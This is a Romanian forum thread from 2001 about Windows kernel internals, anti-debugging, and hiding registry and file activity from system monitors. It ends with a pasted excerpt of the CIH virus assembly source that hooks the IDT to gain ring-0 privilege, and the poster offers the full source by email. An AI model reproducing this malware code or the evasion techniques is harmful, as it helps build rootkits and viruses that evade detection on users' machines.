noul PSP ( asm people only )

[Man^Crowd]

Salut,

1. Are careva ceva documentatie despre "noul PSP" de windoze?
2. Ceva despre kernel mode drivers numai pe NT (exclus ddk) are careva?!?

Mersi,
Man^Crowd

[Entropy]

Try this, gasesti cam tot ce se poate gasi: http://win32asm.cjb.net
I hope it helps.
BTW, ce vrei sa faci?

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

Mersi man, dar stiam de site. Oricum acum am mai vazut ceva nou pe la tip.
De cealalta chestie nu stii nimic?
Hai ca dau la schimb suport pentru codare de VxD-uri..

[Entropy]

Thanks pentru suportul de codare VxD-uri, dar exista acolo pe site documentatia necesara
Uita-te pe la ASM Ring, s-ar putea sa gasesti acolo ce cauti...
Dar zi mai exact ce vrei sa faci (daca nu e secret ), ca poate te pot/putem ajuta mai bine.

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

Ce faza...acu am vrut sa modific postul, ca am uitat sa-ti spun ce anume vreau sa fac, si mi-ai luat-o inainte..
Tot ce vreau e sa-mi fac si eu loc prin maruntaiele windoz-ului.. .
Stii...ma simt bine cind pot sa le dau cite una debugger-elor, monitoarelor, dezasambloarelor........................................... mi-a mai ramas NT sa-i umblu pe sub "fusta".
10x again

Man^Crowd

[This message has been edited by Man^Crowd (edited 09 Ianuarie 2001).]

[Entropy]

Aaaaa...
Pai sant o multime de tehnici anti-debugging, si anti SoftIce (the best debugger, IMHO).
Daca doar asta vrei, e [relativ] simplu.
Dar keep in mind ca orice ai face, tot poate cineva sa iti 'sparga' codul (daca e suficient de valoros (daca nu e, oricum nu se oboseste nimeni ))


------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

Momentan am treaba cu monitoarele, pentru ca primul lucru pe care il face l-useru-l (de rind sau "bashtinasul"..cum vrei) e sa porneasca monitorul (de ce sa nu vada si el ceva?!).
Ca sa mai aberez un pic....mai exista 2 categorii
1. "Industrial guys" (specialisti in spargeri la octet (74 - 75) prin cunoasterea jmp, call, mov, si sa nu uit importantul je. jne [most used])
2. "3llit3 guys", cei care te fac sa iti pui intrebari pina iti gasesti raspunsul pe warez,... un fel de stonehenge guys..

In chestia cu spartul...100% de acord. Vechea regula "Daca e ceva de calitate, e ca si spart"

Nu ma supar sa mai stiu si eu ceva anti-debug?!..ce zici?..
PS. eventual pe personala : man@personal.ro

[Entropy]

Sorry, dar nu am cunostinte anti-debugging.
Eu sant un adept convins al Open Source
Dar oricum, gasesti pe net o gramada de tehnici anti-debugging. Cauta pe google, si sant sigur ca nu o sa ai timp sa citesti ce gasesti.

P.S. La ce fel de monitoare te referi? Da un exemplu de activitate pe care vrei sa o ascunzi.

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

.....normal ca de .... de registry, fisiere, thread-uri, TCP/IP etc.....and stuff
BTW, tu la ce monitoare te gindeai?!

Man^Crowd

[This message has been edited by Man^Crowd (edited 09 Ianuarie 2001).]

[Entropy]

*smile*
Activitatea TCP/IP nu o poti ascunde foarte bine, chiar si cu mama anti-monitoarelor. Adica, e suficient sa intrii printr-un proxy and/or gateway, si loghezi tot traficul (pe retea Ethernet e si mai simplu, pui un sniffer si gata).
Ideea ar fi ca programul tau sa se puna inaintea Windozeului (kind of SoftIce), pentru ca altfel isi face cineva un VxD (pe 9*) sau un driver or something pe NT/2K, si tot trece de protectiile tale...
Nu ma gandeam la nici un fel de monitor, (adica n-am facut nici o asumtie)

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

*smile* at *smile*
Nu imi bat capul cu TCP-ul momentan... Ceea ce am spus eu erau exemple de monitoare. (pe mine ma dor alea de registry si fisiere)
Chestia pe care ai spus-o tu cu scrierea VxD-urilor care te pot fenta, nu e chiar asa.
Adica...oricine poate sa scrie un VxD, dar sint putini cei care stiu sa fie si "cinstiti".
Mai exact "eu" ca VxD nu sint la fel de cinstit ca un monitor, iar "tu" ca VxD nu prea ai ce sa imi faci (adica nu stii cind eu ii dau in freza..De ce nu stii?...pentru ca in momentul cind ii dau in freza stau "deasupra lui" si "a ta").
Daca ai lucrat cu hook-uri intelegi ce vreau sa spun.

Man^Crowd

[Man^Crowd]

...si inca ceva...tot ce poti sa faci e sa ma "kill-eresti" cu totul

Man^Crowd

[Entropy]

*smile* at *smile* at *smile*
Ideea e ca pot sa citesc registrii si/sau fisiere lucrand low level cu HDDul (Yeah, I know, it's not exactly easy), si tu ca VxD nu ai de unde sa stii. Adica ma rog, tu trebuie sa sti ca VxDul meu face anumite chestii.
Besides, ruland in Ring 0, nu dai socoteala nimanui, deci nu prea vad cum un alt VxD ar putea stii ce fac eu (decat daca se baga FOARTE adanc in kernel, si inlocuieste o gramada de APIuri...

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

*smiles* de 4 ori. piua
Deci hai sa facem o analiza:
1. "Ideea e ca pot sa citesc registrii si/sau fisiere lucrand low level cu HDDul (Yeah, I know, it's not exactly easy), si tu ca VxD nu ai de unde sa stii."
Pai nu e exact ceea ce spuneam eu ?
Si inca ceva...sa nu uiti ca eu operez si la nivel de I/O cu HDD-ul (tot pe ring 0...deci iara nu ai ce face)

2. "Besides, ruland in Ring 0, nu dai socoteala nimanui, deci nu prea vad cum un alt VxD ar putea stii ce fac eu (decat daca se baga FOARTE adanc in kernel, si inlocuieste o gramada de APIuri"

Nu e din nou ceea ce spuneam eu?
Si inca ceva: ce inseamna "FOARTE adinc in Kernel"?
Si inca ceva + 1: nu e vorba acolo de API-uri ... gindeste-te ca eu dau peste nas serviciilor apelate de API-uri, deci ele de fapt nu exista pentru mine.

Numai bine,
Man^Crowd

[Entropy]

Foarte adanc in kernel as in... replace most of the kernel with your very own code
Cand am zis API-uri m-am gandit si la rutinele low level (de ring 0 sau 1) care sant apelate de APIuri.
And, if I'm thinking better... nici nu ai nevoie de VxDuri ca sa intrii in Ring 0
inlocuieste pointerul care trateaza o anumita intrerupere, sa duca spre codul tau, then:
xor ebx,ebx
div ebx
Voila, esti in Ring 0 (asta face virusul Cih)

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

Am sa te las pe tine sa inlocuiesti pointerul ala, si am sa incerc si eu probabil daca imi spui si mie cu am acces la TVI in windoz (ring 3).
Referitor la API-uri...eu cind spui API ma gindesc la API-uri.. ...ring 3.


Numai bine,
Man^Crowd

[This message has been edited by Man^Crowd (edited 09 Ianuarie 2001).]

[Entropy]

Cauta pe net codul sursa de la Cih, si uita-te cum face.
Nu am facut asta niciodata, dar stiu sigur ca Cih o face, cumva, prin metoda pe care am spus-o anterior.

------------------
File permision of the beast: rw-rw-rw-

[Man^Crowd]

ok...mersi de discutie, si scuze pentru timpul pe care ti l-am furat. (parca as fi o gagica aburita.. )

Numai bine,
Man^Crowd

[Entropy]

Uite cum face Cih-ul (acum sant acasa, si am codul sursa in fata)
Daca vrei tot codul, send me a mail.

MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

push esi

mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address

pop esi

; *************************************
; * Generate Exception to Get Ring0 *
; *************************************

int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $